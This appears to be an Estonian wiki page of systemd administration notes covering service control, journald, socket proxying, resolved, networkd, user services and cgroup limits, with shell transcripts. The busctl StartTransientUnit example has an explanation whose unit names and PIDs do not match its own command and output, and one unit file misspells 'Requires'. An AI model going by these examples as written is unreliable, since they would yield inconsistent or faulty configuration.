10336 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: autovacuum launcher process
10337 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: stats collector process

kus

* erinevate PostgreSQL protsessi kompilektide protsessid on sama süsteemi kasutaja postgres omad, aga kuuluvad erinevatesse kerneli CGROUP'idesse

Tapmiseks nö -9 signaaliga

# systemctl kill -s SIGKILL postgresql@9.4-test.service

====Samba====

Teenuste seiskamine

# systemctl stop smbd
# systemctl stop nmbd

kontrolliks

# ps aux | grep mb

AD kasutamiseks

# systemctl start samba-ad-dc

====OpenVPN====

Kui OpenVPN kliendi seadisus asub failis /etc/openvpn/client.conf, siis käivitamiseks sobib öelda

# systemctl start openvpn@client.service

====Serial konsool====

Serial konsooli käivitamiseks sobib öelda

# systemctl enable serial-getty@ttyS0.service
Created symlink from /etc/systemd/system/getty.target.wants/serial-getty@ttyS0.service \
to /lib/systemd/system/serial-getty@.service.

# systemctl start serial-getty@ttyS0.service

Tulemusena saab ipmitool, cu, minicom jt programmide abil pöörduda serial konsooli poole.

====NUT====

Tundub, et töötab, nt

# systemctl status nut-server
# systemctl status nut-client

====iptables====

Kasulikud lisamaterjalid

* http://www.auul.pri.ee/wiki/Iptables_kasutamine_Debianiga#iptables-persistant

====rsyslog====

Peatamiseks

# systemctl stop syslog.socket rsyslog.service

vastasel korral tuleb sõnum sisse ja rsyslog teenus käivitatakse automaatselt.

====Varnish====

Kuulava pordi muutmine failis

# grep ^ExecS /lib/systemd/system/varnish.service
ExecStart=/usr/sbin/varnishd -j unix,user=vcache -F -a :80 -T localhost:6082 -f /etc/varnish/default.vcl -S /etc/varnish/secret -s malloc,256m

Logimisel X-Forwarded-For kasutamiseks

# grep ^ExecS /lib/systemd/system/varnishncsa.service
ExecStart=/usr/bin/varnishncsa -F '%%{X-Forwarded-For}i %%l %%u %%t \"%%r\" %%s %%b \"%%{Referer}i\" \"%%{User-agent}i\"' -a -w /var/log/varnish/varnishncsa.log

Muudatuste kehtestamiseks

# systemctl daemon-reload
# /etc/init.d/varnishncsa restart
# /etc/init.d/varnish restart

Logis on näha X-Forwarded-For päisest tulnud aadress ning tcp ühenduse teise otspunkti aadress

<pre>
# tail -f /var/log/varnish/varnishncsa.log
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
...
</pre>

===Logimine===

Systemd sisaldab logimise komponenti journald.

====Süsteemi alglaadimine====

Logimise haldusutiliit näitab vaikimisi kogu kogutud logi alates viimasest alglaadimisest, vanemad sissekanded eespool

# journalctl
-- Logs begin at Mon 2015-07-27 23:03:45 EEST, end at Tue 2015-07-28 08:41:14 EEST. --
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuset
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpu
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuacct
Jul 27 23:03:45 systemd kernel: Linux version 4.0.0-2-amd64 (debian-kernel@lists.debian.org) (gcc version 4.9.3 (Debian 4.9.3-2) ) #1 SMP Debian 4.0.8-2 (2015-07-22)
Jul 27 23:03:45 systemd kernel: Command line: BOOT_IMAGE=/vmlinuz-4.0.0-2-amd64 root=/dev/mapper/systemd-root ro console=ttyS0,9600
...

journald töötamisest annab tunnistust protsess

# ps aux | grep journald
..
root 172 0.1 1.0 35112 5208 ? Ss 08:55 0:00 /lib/systemd/systemd-journald

====Märkused====

Tundub, et vahel võib The Journal seisma jääda (nt saab failisüsteem täis vms), see paistab sedasi ja midagi ei logita (nt logger protsessiga)

Mar 28 03:37:01 keskus systemd-journal[29787]: Journal stopped
-- Subject: The Journal has been stopped
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel

Käivitamiseks

# systemctl start systemd-journald

# journalctl -xn
...
May 19 02:36:01 keskus systemd[1]: Starting Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Started Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket.
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket.
May 19 02:36:01 keskus systemd[1]: Starting Journal Service...
May 19 02:36:01 keskus systemd[1]: Started Journal Service.
May 19 02:36:01 keskus systemd-journal[32447]: Journal started
-- Subject: The Journal has been started
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel
--
-- The system journal process has been starting up, opened the journal
-- files for writing and is now ready to process requests.

====Apache veebiserver====

Kui Apache seadistusfailis on viga, siis see paistab journald juurest välja selline

# journalctl -u apache2
..
Jul 28 09:11:31 systemd systemd[1]: Starting LSB: Apache2 web server...
Jul 28 09:11:31 systemd apache2[2491]: Starting web server: apache2 failed!
Jul 28 09:11:31 systemd apache2[2491]: The apache2 configtest failed. ... (warning).
Jul 28 09:11:31 systemd apache2[2491]: Output of config test was:
Jul 28 09:11:31 systemd apache2[2491]: AH00526: Syntax error on line 1 of /etc/apache2/sites-enabled/000-default.conf:
Jul 28 09:11:31 systemd apache2[2491]: <VirtualHost> directive missing closing '>'
Jul 28 09:11:31 systemd apache2[2491]: Action 'configtest' failed.
Jul 28 09:11:31 systemd apache2[2491]: The Apache error log may have more information.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Control process exited, code=exited status=1
Jul 28 09:11:31 systemd systemd[1]: Failed to start LSB: Apache2 web server.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Unit entered failed state.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Failed with result 'exit-code'.

kus

* journald tegeleb apache2 protsessidega seotud nö süsteemse logiga, mitte http päringute logimisega

====Kasulikud lisamaterjalid====

* https://www.digitalocean.com/community/tutorials/how-to-use-journalctl-to-view-and-manipulate-systemd-logs
* http://0pointer.de/blog/projects/journalctl.html

===targetite vahel liikumine===

Nö init=/bin/bash keskkonda liikumiseks tuleb kasutada bootloaderis tuuma real parameetrit

systemd.unit=emergency.target

tulemusena jõutakse (arvuti hostname on antud juhul systemd)

..
Welcome to Debian GNU/Linux stretch/sid!

[260222.496889] systemd[1]: Set hostname to <systemd>.
[ OK ] Created slice Root Slice.
[260223.089638] systemd[1]: Created slice Root Slice.
[260223.096748] systemd[1]: Starting Root Slice.
[ OK ] Created slice System Slice.
[260223.109289] systemd[1]: Created slice System Slice.
[260223.115005] systemd[1]: Starting System Slice.
[ OK ] Started Emergency Shell.
[260223.134133] systemd[1]: Started Emergency Shell.
[260223.146296] systemd[1]: Starting Emergency Shell...
Starting Emergency Shell...
[ OK ] Reached target Emergency Mode.
[260223.192047] systemd[1]: Reached target Emergency Mode.
[260223.205684] systemd[1]: Startup finished in 3.658s (kernel) + 967ms (userspace) = 4.626s.
[260223.221455] systemd[1]: Starting Emergency Mode.
[260223.232336] systemd[157]: emergency.service: Failed at step EXEC spawning /bin/plymouth: No such file or directory
Welcome to emergency mode! After logging in, type "journalctl -xb" to view
system logs, "systemctl reboot" to reboot, "systemctl default" or ^D to
try again to boot into default mode.
Give root password for maintenance
(or press Control-D to continue): <root parool>
root@systemd:~#

Tavalisse nn multi-user režiimi jõudmiseks sobib öelda seejärel

# systemctl isolate multi-user.target

Arvuti väljalülitamiseks sh toitest

# systemctl poweroff

===systemd-socket-proxyd===

systemd-ocket-proxyd võimaldab käivitada teenuse selle poole pöördumisel. Nt nginx protsessid käivitatakse port 80 poole pöördumisel. Selleks tuleb

* seadistada nginx server kuulama port 8080

# cat /etc/nginx/sites-available/default
..
server {
listen 8080 default_server;
...

* tekitada .service tüüpi unit (erinevalt man systemd-socket-proxyd soovitusest on JoinsNamespaceOf ja PrivateNetwork välja kommenteeritud ja lülitatud)

# cat /etc/systemd/system/proxy-to-nginx.service
[Unit]
Rquires=nginx.service
After=nginx.service
# JoinsNamespaceOf=nginx.service

[Service]
ExecStart=/lib/systemd/systemd-socket-proxyd 127.0.0.1:8080
PrivateTmp=yes
PrivateNetwork=no

* tekitada .socket tüüpi unit

# cat /etc/systemd/system/proxy-to-nginx.socket
[Socket]
ListenStream=80

[Install]
WantedBy=sockets.target

Seejärel tuleb sisse lülitada ja käivitada socket unit (nginx ise ega proxy-to-nginx.service ei pea töötama)

# systemctl enable proxy-to-nginx.socket
# systemctl start proxy-to-nginx.socket

Tulemusena pöördudes aadressile http://127.0.0.1:80/ käivitatakse .service ja nginx protsessid.

Kasulikud lisamaterjalid

* https://developer.atlassian.com/blog/2015/03/docker-systemd-socket-activation/
* man systemd-socket-proxyd

===systemd-resolved===

Paigaldada pakett libnss-resolve

# apt-get install libnss-resolve

Kirjeldada meelepärane nö ISP nimeserver

# cat /etc/systemd/resolved.conf

[Resolve]
DNS=10.192.0.53

Lülitada sisse systemd-resolved

# systemctl start systemd-resolved
# systemctl enable systemd-resolved

Testida systemd-resolved rekursiivse nimeserveri töötamist

# /lib/systemd/systemd-resolve-host kuutorvaja.eenet.ee
kuutorvaja.eenet.ee: 193.40.0.7

-- Information acquired via protocol DNS in 157.3ms.

Kustutada fail /etc/resolv.conf

# rm /etc/resolv.conf

Kasutada failis /etc/nsswitch.conf rida

hosts: files resolve dns

Soovi korral

# ln -fs /run/systemd/resolve/resolv.conf /etc/resolv.conf

Debugi sisselülitamine

# cp /lib/systemd/system/systemd-resolved.service /etc/systemd/system

kus on sektsioonis Service lisatud debug

[Service]

..
Environment=SYSTEMD_LOG_LEVEL=debug

dns cache jms logisse kirjutamiseks

# kill -SIGUSR1 PID

Tulemuse esitamine

# systemd-resolve --status

Logi jälgimine

# journalctl -f -u systemd-resolved

===localectl===

# localectl list-locales
C.UTF-8
en_US.utf8

===Service haldamine===

Käivitamine

# systemctl start apache2

Oleku küsimine

# systemctl status apache2

Seiskamine

# systemctl stop apache2

Väljalülitamine, st selliselt seadistatud teenust ei käivitata automaatselt (süsteemi alglaadimisel, mingi event esinemisel vms), aga käsitsi start abil saab käivitada

# systemctl disable apache2

Sisselülitamiseks

# systemctl enable apache2

Maskeerimine, selliselt seadistatud teenust ei saa üldse käivitada

# systemctl mask apache2

Maskeerimise väljalülitamiseks

# systemctl unmask apache2

Kõigi service'ite nimekirja küsimine (töötavate küsimiseks jätta -a ära; sarnaselt saab küsida target, socket, mount)

# systemctl list-units --type service -a

Kõigi failide nimekirja küsimine

# systemctl list-unit-files --type=service

systemd seadistustes tehtud muudatuste esitamine

# systemd-delta

Sõltuvuste nimekirja esitamine

# systemctl list-dependencies sshd.service

Teenuse omaduste esitamiseks

# systemctl show sshd.service

Unitite seadistusfailidega töötamiseks sobib öelda (vastavalt redigeeritakse /etc/systemd/system/nginx.service, /etc/systemd/system/nginx.service.d/failinimi või esitatakse faili sisu)

# systemctl edit --full nginx.service
# systemctl edit nginx.service
# systemctl cat nginx.service

===systemd-networkd===

systemd-networkd tegeleb võrgu seadistamisega. Nt nspawn konteinerile saab võrgu seadistada selliselt

* seadistada konteinerit hostiva arvuti võrguühendus nt bridge-utils bridge abil

* tekitada konteinerisse seadistusfail (kui arvutis on mitu võrguliidest, siis võiks iga liidese jaoks olla oma fail)

# cat /etc/systemd/network/50-static.network
[Match]
Name=host0

[Network]
Address=192.168.10.16/24
Gateway=192.168.10.254

* /etc/network/interfaces failis kirjeldada vaid lo seade

# cat /etc/network/interfaces
source /etc/network/interfaces.d/*
auto lo
iface lo inet loopback

* võrgu käivitamiseks öelda

# systemctl start systemd-networkd

* ipv4 ja ipv6 aadressi seadistamiseks

..
[Network]
Gateway=192.168.10.254

[Address]
Address=192.168.10.16/24

[Address]
Address=110:1/64

===Konsooli alglaadimisjärgse puhastamise lõpetamine===

Järgneva töötamise eelduseks on /etc/default/grub failis "quiet" eemaldamine, vt man systemd -> ShowStatus 'Defaults to enabled, unless quiet is passed as kernel command line option, in which case it defaults to error.' Alternatiiv on kasutada kernel argumenti 'systemd.show_status=1'.

Viisakas variant

<pre>
# systemctl edit getty@tty1
..

[Service]
TTYVTDisallocate=no

...
</pre>

Vulgaarsem variant

# mkdir /etc/systemd/system/getty@tty1.service.d
# cat /etc/systemd/system/getty@tty1.service.d/noclear.conf
[Service]
TTYVTDisallocate=no

Ja järgmisel alglaadimisel enam ekraani ei puhastata

# reboot

NB! Selleks, et tuuma teateid oleks näha tuleb lisaks GRUB2 seadistusfailis kasutada rida

# cat /etc/default/grub
..
GRUB_CMDLINE_LINUX_DEFAULT=""
...

ning öelda

# update-grub

Kasulikud lisamaterjalid

* http://mywiki.wooledge.org/SystemdNoClear
* https://wiki.archlinux.org/index.php/Systemd_FAQ

===journalctl kasuamine===

Bootimisest alates antud logi sissekannete esitamiseks sobib öelda

# journalctl -b

Selleks, et näha erinevate bootimiskordade logi tuleb öelda

# mkdir /var/log/journal
# sed -ri s/^#Storage=auto/Storage=persistent/ /etc/systemd/journald.conf

tulemusena saab nimekirja vaadata

# journalctl --list-boots

ning konkreetse korra sissekandeid nt

# journalctl -b -2

Uniti vms logi follow režiimis esitamiseks

# journalctl -n 20 -f -u ssh

===systemd-cat===

TODO

===Systemd debugimine===

TODO

Kasulikud lisamaterjalid

* http://freedesktop.org/wiki/Software/systemd/Debugging/

===Ressursikasutuse kontrollimine===

# grep -v "^#" /etc/systemd/system.conf

[Manager]
DefaultCPUAccounting=yes
DefaultBlockIOAccounting=yes
DefaultMemoryAccounting=yes

# systemctl set-property nginx.service MemoryLimit=10M

===systemd-run===

$ systemd-run --user --unit=limit-test.scope --scope -p MemoryAccounting=yes -p MemoryLimit=2M bash

$ systemctl show --user limit-test.scope | grep Mem
MemoryAccounting=yes
MemoryLimit=2M

või

<pre>
root@ph-minio-01:~# systemd-run --user --scope -p MemoryMax=10M -p MemorySwapMax=0 bash
Running as unit: run-p10909-i11209.scope; invocation ID: d3b7a7cc8af2431282ac1e1e7d469e2a

root@ph-minio-01:~# python3 -c 'a = "x" * 20 * 1024 * 1024'
Killed

root@ph-minio-01:~#
</pre>

dbus kaudu scope kapslis protsessi töötamine, käivitada protsess

<pre>
root@systemd-02:~# sleep 300 &
[1] 9261
</pre>

Seostada protsess eraldi moodustatud systemd slice osakonnaga

<pre>
root@systemd-02:~# busctl call org.freedesktop.systemd1 \
/org/freedesktop/systemd1 \
org.freedesktop.systemd1.Manager \
StartTransientUnit \
"ssa(sv)a(sa(sv))" \
"real-server-mimic.scope" \
"fail" \
2 "Slice" "s" "custom-labs-01.slice" "PIDs" "au" 1 8702 \
0
o "/org/freedesktop/systemd1/job/62153"
</pre>

kus

* org.freedesktop.systemd1 /org/freedesktop/systemd1: The destination path pointing directly to systemd's primary system core.
* StartTransientUnit: The literal internal API function name.
* "ssa(sv)a(sa(sv))": The explicit structural signature definition. It alerts systemd to expect: String, String, Array of Variants, and a nested Array of auxiliary configurations.
* "my-direct-dbus.scope": The custom name for the new leaf node container.
* "fail": The conflict mode. It instructs systemd: "If a scope with this exact name already exists, throw an error instead of overriding it."
* 2 "Slice" "s" "custom-labs-01.slice" "PIDs" "au" 1 8620: This tells systemd we are supplying 2 properties inside our payload array:

Set the target Slice property to the string value "custom-labs-01.slice".

Populate the PIDs property array with an active array size of 1, passing our target PID unsigned integer value (8620).

* 0: Passes an empty auxiliary parameters list.

tulemuse kontrolliks

<pre>
root@systemd-02:~# systemd-cgls /custom.slice
CGroup /custom.slice:
└─custom-labs.slice
└─custom-labs-02.slice
└─real-server-02.scope
└─9261 sleep 300
</pre>

===systemd-boot===

TODO

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/systemd-boot

===systemd-hostnamed===

Väited

* busctl käivitab systemd-hostnamed protsessi ajutiselt vastavalt vajadusele
* ta on 'D-Bus On-Demand Activated Service' ehk 'Transient/Ephemeral Daemon' ehk 'Lazy-Loaded / Socket-Activated Daemon'

Muudatuse tegemiseks sobib öelda

<pre>
root@ns-pg-01:~# hostnamectl set-hostname ns-pg-01
</pre>

kus

* muudetakse /etc/hostname fail
* ei muudeta /etc/hosts faili
* väidetavalt teavitatakse syslog jt deemoneid st restart vms ei ole vajalik arvutile
* reaalselt süsteemi hostname muutmisel hostnamectl programmist väga palju abi ei ole, /etc/hosts fail tuleb käsitsi muuta

===systemd-logind===

====Mõisted====

* seat
* session

====Tööpõhimõte====

Kasutaja sisselomisel moodustatakse nö sessioon

* '$ systemd --user ..' - käivitatakse per kasutaja systemd lahendus (seejuurde kuulub systemd-user service'ite käivitamine)
* '$ busctl lis') - per kasutaja dbus käivitamine (busctl list)
* '$ lsns' - moodustatakse per kasutaja namespace'ide komplekt (user, mount, pid jne)
* 'man pam_systemd' - pam kaudu kutsutakse välja kasutajapõhine systemd lahendus

nn linger abil saab kasutaja sessiooni tekitada automaatselt süsteemi algkäivituse käigus

<pre>

</pre>

====Misc====

systemd-logind asendab ConsoleKit lahenduse. nt saab küsida

<pre>
# loginctl list-sessions
SESSION UID USER SEAT TTY
31 0 root seat0 /dev/tty2
189 1001 priit seat0 /dev/tty4
2 1000 imre seat0
c5 111 lightdm seat0
187 1001 priit seat0 /dev/tty3
33 1000 imre seat0

6 sessions listed.
</pre>

Arvuti sees root kasutajana tavakasutaja service nimekirja küsimine

<pre>
root@ph-minio-01:~# systemctl --user -M kasutaja@.host list-units --type=service
UNIT LOAD ACTIVE SUB DESCRIPTION
dbus.service loaded active running D-Bus User Message Bus
nginx-08.service loaded active running My Nginx Quadlet Service
nginx-09.service loaded active running My Nginx 09 Quadlet Service
...
</pre>

kasutaja status küsimine

<pre>
kasutaja@ph-minio-01:~$ loginctl user-status
kasutaja (1000)
Since: Sun 2026-04-19 18:59:50 EEST; 1h 15min ago
State: active
Sessions: *69 68
Linger: no
Unit: user-1000.slice
├─session-69.scope
│ ├─3556 "sshd-session: kasutaja [priv]"
│ ├─3563 "sshd-session: kasutaja@pts/1"
│ ├─3564 -bash
│ ├─3883 loginctl user-status
│ └─3884 pager
...
</pre>

kus

* linger info - no

Kasulikud lisamaterjalid

* https://yakking.branchable.com/posts/systemd-4-logind/

===systemd system service===

TODO

===systemd user service===

Kui tavaliselt on kasutusel systemd põhises keskkonnas nn süsteemne systemd halduse lahendus, mis tegeleb teenus-protsessidega, siis systemd user service on selline asjakorraldus, kus sarnane tulemus saavutatakse tavakasutaja tingimustes. Üks võimalik lähtepunkt on, et süsteemi on tavakasutaja abil sisse logitud üle ssh ühes aknas

<pre>
root@pwrk-02:~# ps U priit
20185 ? Ss 0:00 /usr/lib/systemd/systemd --user
20187 ? S 0:00 (sd-pam)
20201 ? S 0:00 sshd-session: priit@pts/0
20202 pts/0 Ss 0:00 -bash
</pre>

kus

* sellega kaasneb kasutaja-põhise systemd protsessi töötamine

ja teises aknas asutakse tegutsema

<pre>
root@pwrk-02:~# su - priit
priit@pwrk-02:~$ export XDG_RUNTIME_DIR=/run/user/1002
</pre>

kus

* systemctl --user ... leiab selle XDG kataloogi suhtes standardsest asukohast systemd user soketi (/run/user/1002/systemd/private)

systemd user service ehk kasutaja-põhine teenus paistab välja selline

<pre>
priit@pwrk-02:~$ systemctl --user list-units | grep http
bash-http-server.service loaded active running Bash Netcat HTTP Microservice

priit@pwrk-02:~$ systemctl --user status bash-http-server.service
● bash-http-server.service - Bash Netcat HTTP Microservice
Loaded: loaded (/home/priit/.config/systemd/user/bash-http-server.service; enabled; preset: enabled)
Active: active (running) since Sun 2025-10-12 20:39:01 UTC; 21min ago
Main PID: 910 (bash-http-serve)
Tasks: 2 (limit: 9410)
Memory: 704.0K (peak: 1.4M)
CPU: 5ms
CGroup: /user.slice/user-1002.slice/user@1002.service/app.slice/bash-http-server.service
├─910 /bin/bash /home/priit/bin/bash-http-server
└─913 nc -l -p 5100 -q 1

Oct 12 20:39:01 pwrk-02 systemd[869]: Started bash-http-server.service - Bash Netcat HTTP Microservice.

priit@pwrk-02:~$ curl http://127.0.0.1:5100
<h1>Hello from the Bash Server Service!</h1><p>Running as user: priit</p>
</pre>

vastavad protsessid

<pre>
root@pwrk-02:~# ps U priit
PID TTY STAT TIME COMMAND
885 ? Ss 0:00 /usr/lib/systemd/systemd --user
889 ? S 0:00 (sd-pam)
923 ? Ss 0:00 /bin/bash /home/priit/bin/bash-http-server
929 ? S 0:00 nc -l -p 5100 -q 1
</pre>

kus

* haldav protsess (systemd --user) töötab sama kasutajana nagu hallatav protsess (bash-http-server ja nc) - võib olla ei ole see parim isolatsioon

programmi on selline

<pre>
priit@pwrk-02:~$ cat /home/priit/bin/bash-http-server
#!/bin/bash
# A simple, single-page HTTP server using Netcat

# Port to listen on (high port recommended for unprivileged user)
LISTEN_PORT=5100

# The HTTP response content
HTTP_CONTENT="<h1>Hello from the Bash Server Service!</h1><p>Running as user: $(whoami)</p>"

# HTTP headers
HTTP_RESPONSE="HTTP/1.1 200 OK\r\n"
HTTP_RESPONSE+="Content-Type: text/html\r\n"
HTTP_RESPONSE+="Content-Length: ${#HTTP_CONTENT}\r\n"
HTTP_RESPONSE+="\r\n"
HTTP_RESPONSE+="${HTTP_CONTENT}"

# Loop forever, listening for connections and serving the response
while true; do
# Use netcat to listen on the port, process one request, and close.
# The 'echo' ensures the response is sent back.
printf "%b" "$HTTP_RESPONSE" | nc -l -p $LISTEN_PORT -q 1
done

priit@pwrk-02:~$ chmod 0755 /home/priit/bin/bash-http-server
</pre>

kasutaja-põhine systemd unit service

<pre>
priit@pwrk-02:~$ mkdir -p .config/systemd/user
priit@pwrk-02:~$ cat .config/systemd/user/bash-http-server.service
[Unit]
Description=Bash Netcat HTTP Microservice

After=network-online.target
Wants=network-online.target

[Service]
ExecStart=/home/priit/bin/bash-http-server
Restart=always
RestartSec=5s

[Install]
# This is typically the correct target for persistent user services
WantedBy=default.target
</pre>

Lülitatakse sisse kasutaja nö lingerdamine

<pre>
imre@pwrk-02:~$ loginctl enable-linger priit
</pre>

loetakse sisse systemd seadistuse muudatused

<pre>
priit@pwrk-02:~$ systemctl --user daemon-reload
</pre>

ning aktiveeritakse teenus + käivitatakse

<pre>
priit@pwrk-02:~$ systemctl --user enable --now bash-http-server.service
</pre>

Ootus on, et tulemusena käib teenus, nagu lõigu alguses on esitatud.

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Systemd/User
* https://unix.stackexchange.com/questions/251211/why-doesnt-my-systemd-user-unit-start-at-boot
* https://www.brendanlong.com/systemd-user-services-are-amazing.html

===journald user logs===

TODO

===tmpfiles-setup===

tmpfiles-setup haldab programmide ajutiste jms failide jaoks kataloogide olemasolu eest

<pre>
# ls -ld /usr/lib/tmpfiles.d/*
-rw-r--r-- 1 root root 238 Dec 2 2015 /usr/lib/tmpfiles.d/00rsyslog.conf
-rw-r--r-- 1 root root 153 Dec 2 2015 /usr/lib/tmpfiles.d/dbus.conf
-rw-r--r-- 1 root root 577 Jul 5 16:56 /usr/lib/tmpfiles.d/debian.conf
-rw-r--r-- 1 root root 362 Jul 19 02:56 /usr/lib/tmpfiles.d/home.conf
-rw-r--r-- 1 root root 1098 Jul 19 02:56 /usr/lib/tmpfiles.d/journal-nocow.conf
-rw-r--r-- 1 root root 812 Jul 19 02:56 /usr/lib/tmpfiles.d/legacy.conf
-rw-r--r-- 1 root root 61 Apr 16 2016 /usr/lib/tmpfiles.d/lvm2.conf
-rw-r--r-- 1 root root 239 Feb 5 2016 /usr/lib/tmpfiles.d/passwd.conf
-rw-r--r-- 1 root root 176 Feb 21 2016 /usr/lib/tmpfiles.d/postgresql.conf
-rw-r--r-- 1 root root 33 Jun 9 2015 /usr/lib/tmpfiles.d/screen-cleanup.conf
-rw-r--r-- 1 root root 31 Mar 16 2017 /usr/lib/tmpfiles.d/sshd.conf
-rw-r--r-- 1 root root 313 Jul 4 10:37 /usr/lib/tmpfiles.d/sudo.conf
-rw-r--r-- 1 root root 1544 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd.conf
-rw-r--r-- 1 root root 496 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd-nologin.conf
-rw-r--r-- 1 root root 637 Jul 19 02:56 /usr/lib/tmpfiles.d/tmp.conf
-rw-r--r-- 1 root root 532 Jul 19 02:56 /usr/lib/tmpfiles.d/var.conf
-rw-r--r-- 1 root root 623 Jul 19 02:56 /usr/lib/tmpfiles.d/x11.conf
-rw-r--r-- 1 root root 41 Aug 16 12:13 /usr/lib/tmpfiles.d/zabbix-agent.conf
</pre>

===Timer===

TODO

# systemctl list-timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2017-07-25 06:52:49 EEST 6h left Mon 2017-07-24 06:49:40 EEST 17h ago apt-daily.timer apt-daily.service
Tue 2017-07-25 10:41:54 EEST 10h left Mon 2017-07-24 10:41:54 EEST 13h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

===systemd-fstab-generator===

Paistab, et systemd tekitab automaatselt /etc/fstab sisule vastavad unit failid /run alla, nt

<pre>
# cat /run/systemd/generator/var-lib-postgresql.mount
# Automatically generated by systemd-fstab-generator

[Unit]
SourcePath=/etc/fstab
Documentation=man:fstab(5) man:systemd-fstab-generator(8)
Before=local-fs.target
Requires=systemd-fsck@dev-system-var_lib_postgresql.service
After=systemd-fsck@dev-system-var_lib_postgresql.service

[Mount]
What=/dev/system/var_lib_postgresql
Where=/var/lib/postgresql
Type=ext4
</pre>

Kui fstab sees kirjeldatud LVM voluumi nime jääb samaks, aga UUID muutub (nt olemasolev LVM volüüm kustutada ja tekitada asemele teine) ning öelda

# mount /var/lib/postgresql

siis failisüsteem monteeritakse ja ühendatakse ka kohe lahti syslog tekstiga

<pre>
Feb 20 00:57:33 ky-test kernel: [1210006.815639] EXT4-fs (dm-6): mounted filesystem with ordered data mode. Opts: discard
Feb 20 00:57:33 ky-test systemd[1]: var-lib-postgresql.mount: Unit is bound to inactive unit dev-system-var_lib_postgresql.device. Stopping, too.
Feb 20 00:57:33 ky-test systemd[1]: Unmounting /var/lib/postgresql...
Feb 20 00:57:33 ky-test systemd[1]: Unmounted /var/lib/postgresql.
</pre>

Lahenduseks on öelda

# systemctl daemon-reload

===Märkused===

* kerneli mooduleid loeb käivitamisel systemd-modules-load

systemd-modules-load.service

Seadistusfailiks on

# ls -ld /etc/modules-load.d/modules.conf
lrwxrwxrwx 1 root root 10 Oct 9 14:58 /etc/modules-load.d/modules.conf -> ../modules

systemd komponente kasutavas operatsioonisüsteemis töötavad nt sellised protsessid

# ps aux | grep '/lib/systemd/systemd-'
root 173 0.0 0.5 28188 2912 ? Ss 15:39 0:00 /lib/systemd/systemd-journald
root 190 0.0 0.7 44072 4000 ? Ss 15:39 0:00 /lib/systemd/systemd-udevd
systemd+ 388 0.0 0.4 97952 2312 ? Ssl 15:39 0:00 /lib/systemd/systemd-timesyncd
root 396 0.0 0.5 28352 2772 ? Ss 15:39 0:00 /lib/systemd/systemd-logind
systemd+ 402 0.0 0.5 28504 2892 ? Ss 15:39 0:00 /lib/systemd/systemd-networkd
systemd+ 1004 0.0 0.5 31340 2880 ? Ss 16:00 0:00 /lib/systemd/systemd-resolved

Tundub, et midagi teeb käsk systemd konfi muudatuste kehtestamiseks

# systemctl daemon-reload

Tugevamaks kehtestamiseks või nö jamade lahendamiseks sobib öelda

# systemctl daemon-reexec

===su ja sudo kasutamine===

su/sudo/runuser programmide kasutamisel ei moodustada nö kasutaja keskkonda (environment)

nende asemel annab nö autentsema tulemuse machinectl kasutamine, nt

# machinectl shell imre@

nt on seejärel käivitatud sellised protsessid

<pre>
imre@ph-minio-01:~$ ps U imre
PID TTY STAT TIME COMMAND
1212 pts/1 Ss 0:00 /bin/bash
1216 ? Ss 0:00 /usr/lib/systemd/systemd --user
1218 ? S 0:00 (sd-pam)
1251 pts/1 S 0:00 (sd-pam)
...
</pre>

ja väärtustatud mitmesugused XDG keskkonnamuutujad

<pre>
$ env | grep XDG
XDG_SESSION_TYPE=tty
XDG_SESSION_CLASS=user
XDG_SESSION_ID=29
XDG_RUNTIME_DIR=/run/user/1000
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/deskto
</pre>

===LoadCredentials kasutamine===

<pre>
root@dh-minio-01:~# systemctl edit nginx

[Service]
LoadCredential=ssl_key:/etc/ssl/private/nginx.key
LoadCredential=ssl_cert:/etc/ssl/certs/nginx.crt
PrivateTmp=yes
</pre>

===systemd-analyze===

<pre>
kasutaja@ph-minio-01:~$ systemd-analyze --user security nginx-07
NAME DESCRIPTION EXPOSURE
✗ KeyringMode= Service shares key material with other service 0.2
PrivateTmp= Service runs in special boot phase, option is not appropriate
ProtectHome= Service runs in special boot phase, option is not appropriate
ProtectSystem= Service runs in special boot phase, option is not appropriate
RootDirectory=/RootImage= Service runs in special boot phase, option is not appropriate
SupplementaryGroups= Service runs as root, option does not matter
RemoveIPC= Service runs as root, option does not apply
✗ User=/DynamicUser= Service runs as root user 0.4
✗ CapabilityBoundingSet=~CAP_SYS_TIME Service processes may change the system clock 0.2
✗ NoNewPrivileges= Service processes may acquire new privileges 0.2
